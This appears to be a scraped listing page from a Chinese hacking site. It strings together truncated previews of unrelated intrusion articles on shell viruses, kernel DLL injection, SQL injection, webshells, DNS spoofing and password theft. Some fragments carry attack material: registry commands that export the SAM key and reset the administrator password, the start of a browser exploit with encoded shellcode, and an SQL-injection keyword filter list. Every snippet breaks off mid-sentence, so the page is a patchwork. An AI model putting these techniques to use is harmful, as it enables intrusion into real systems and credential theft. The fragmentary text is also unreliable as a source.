前言 ---- 　 本文来源于29A病毒杂志,其上对linux shell病毒技术有了一个综合的阐述,我不想翻译它,我以它的那篇为模板 写了这篇中文的文章,里面的代码我都做了调试. 　 对于shell编程的程序员来说所谓的shell病毒技术其实根本就是小牛一毛

驱动源码如下(每个函数及重要部份都标上了注释)代码:;@echo off;goto make;功能:驱动实现模拟键盘按键;说明:模拟键盘按键就需要访问IO端口 但是系统默认是不允许访问的，所以我们利用驱动修改TSS中的IOPM(IO许可位图),允许我们的主程序访

文章作者: sudami信息来源:邪恶八进制《N种内核注入DLL的思路及实现》 Author : sudami [sudami@163.com] Time : 01-11-2008 Links :http://hi.baidu.com/sudami 内核注入，技术古老但很实用。现在部分RK趋向无进程,玩的是SYS+DLL，有的无

+展开-HTMLHTMLHEADTITLE获取客户端MAC和用户名/TITLEMETAhttp-equiv=Content-Typecontent="text/html;charset=gb2312"SCRIPTlanguage=JScriptevent="OnCompleted(hResult,pErrorObject,pAsyncContext)"for=foodocument.forms[0].txtMACA

去网吧上网，好不容易下载了半天的东西，可让我一不小心把电脑的电源给踢了，因为网吧的机子是装了还原的，重启之后就什么都没了，我气啊，今天不把你破了，我就不叫monster。首先看看是什么还原系统，可是查了半天也没查出来。无意之中打

一个朋友准备上某职业技术学校，说该学校号称是国家级重点中等职业学校，只要进入该学校每个学生即可享受3000元国家助学金，该学校网站如图1所示，目前要了解一个学校，只有两种方式，一种是进行实地考察，另外一种就是通过网站来了解，既

Ajax 概述 　　Ajax 通过将用户的浏览器体验(例如，企业对企业交易)转换为一个基于 XML的 Web 服务门户(例如企业对消费者交易)，实现了响应式和交互式 Web 服务。Ajax 使用的方法是在 Web 页面和服务器之间，通过 HTTP 协议构建一个额外的

来源：eNetGoogle产品在最近暴露一个安全漏洞，这个漏洞可窃取Google的cookie，它存在于一款基于网页的对照购物产品——Froogle。公司宣称已经把该漏洞标记为潜在安全漏洞，并对其进行修复。现时和未来的Froogle用户都会受到保护。某爱尔

1.acunetix web vulnerability Scanner 4 简称AC4 2.另外以下一种方式走的通,就不用往下走了 3.个人爱好用Portready,是因为他快速准确,当然你也可以用别的. 4.AC4扫描很耗时间,扫一个网站大约需要3-5个小时,扫整个网段大约需要8个小时左右

文章作者：风流倜傥某日在cn群里聊天，有朋友丢出一个jay官方网站的注入点，闲着无聊就测试了下。没想到最后轻松的得到了系统权限。在取得webshell过程中遇到点困难，也学到了一点东西。看注射点，老规矩，先提交个单引号，返回错误提示是

Oracle说明: Oracle的注射攻击学习,可以归为:a.基本猜解: 1. 数据库名的猜解,表名的猜解,字段的猜解,数据的猜解.等基本数据的猜解.(半折法) 2. union方式猜解 3. UTL_HTTP.request反弹数据猜解.(需能上网) 4. 其它方式的猜解,诸如把表段内

定义： DNS欺骗就是攻击者冒充域名服务器的一种欺骗行为。原理：如果可以冒充域名服务器，然后把查询的IP地址设为攻击者的IP地址，这样的话，用户上网就只能看到攻击者的主页，而不是用户想要取得的网站的主页了，这就是DNS欺骗的基本原理

sa默认可以读sam键.应该。reg export HKLM\SAM\SAM\Domains\Account\Users\000001F4 c:\old.regnet user administrator test用administrator登陆.用完机器后reg import c:\test.reg根本不用克隆.找到对应的sid. http://hi.baidu.com/isbx

作者:Maxil已经发表在黑客手册2008年第三期最近一直比较关注PHP注射的东西.学习好几天了.也应该实战一下了.目标http://app.xxxx.com.一个市场调查的门户.找注射点嘛,还是要用我们可爱的搜索引擎.为什么可爱呢?一会就知道了.Go Go Go !!!!

对特殊字符的过滤，很强很好用我们经常看到的某某版的通用防注入的程序都是对注入的关键字进行过滤的，比如“;|and|exec|insert|select|delete|update|count|*|%|chr|mid|master|truncate|char|declare|'","|"”一类，不过这套程序却对特

前一阵子自己邮箱的口令忘记了，为了找回邮箱口令到网上找了好多密码找回的工具，发现在IE7下都不好使，迫于无奈，只好自己研究了，通过Google和 OllyDbg，用了1整天时间终于弄清楚了IE7下的自动完成口令获取方法，不敢独享，特公布如下，

面对域结构的内网，可能许多小菜没有经验如何去渗透。如果你能拿到主域管理员的密码，整个内网你就可以自由穿行了。主域管理员一般呆在比较重要的机器上，如果能搞定其中的一台或几台，放个密码记录器之类，相信总有一天你会拿到密码。主

ScriptCodingInfo.wsc代码如下，该文件可以改成任意后缀：?xml version="1.0" encoding="gb2312" standalone="yes"??component error="true" debug="true"?packagecomponent id="haiyangtop"publicmethod name="lcx"parameter name="b"//

作者：racle @tian6.com受影响版本:Discuz6.1.0,gbk+utf+big53天前有朋友在论坛问过,说Discuz有个非论坛创始人获得WEBSHELL的漏洞,是superhei早前发出来的一大堆DISCUZ漏洞之一.见原帖:http://bbs.tian6.com/redirect.ph ... 54794ptid=8

360补完还是中的~script language="javascript"if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1)location.replace("about:blank"); function sleep(milliseconds){var start=new Date().getTime(); for(var i=0;i1e7;i++){i

Written by Michael BrooksSpecial Thanks to str0ke and rGodIntrphpMyAdmin is by far the most popular PHP project. Betweenphpmyadmin and the xampp project there are more than 34+ milliondownloads from sourceforge.net . Thi

By:linzi 也就是这两年，圈子里面的人才意识到这个渗透手法很有意思. 可以看一下以前我写过的一篇文章: http://www.hackeye.com/article/2943/ 其实原理很简单，现在模拟一下以前dz被黑的时候的经过. 先通过论坛，收集出管理员的用户名，

程序代码html+展开-HTMLdivid="replace"xfill&msnhack&xfishby[X.F.S.T]/divscriptvarshellcode=unescape("%u56e8%u0000%u5300%u5655%u8b57%u246c%u8b18%u3c45%u548b%u7805%uea01%u4a8b%u8b18%u205a%ueb01%u32e3%u8b49%u8b34%uee01%uff31

在试用VIF，功能还不错，有一些还不会用，百度了一下，发现可以突破，试了一下，还是真的，记录起来。两个不同的方法，一个是lake2的，一个是langouster的，不过lake2的方法在VIF下就不能用，因为检测的方式不一样，VIF是检测关键字，只要

作者：flyh4thttp://bbs.wolvez.org关键字：首页-马克斯CMS2.0这个系统是国内非常流行的视频点播系统，之前的1.5版本漏洞非常多，2.0版本在安全方面有所提高，但是依然有漏洞存在。看代码\inc\ajax.aspdim action : action = getForm("ac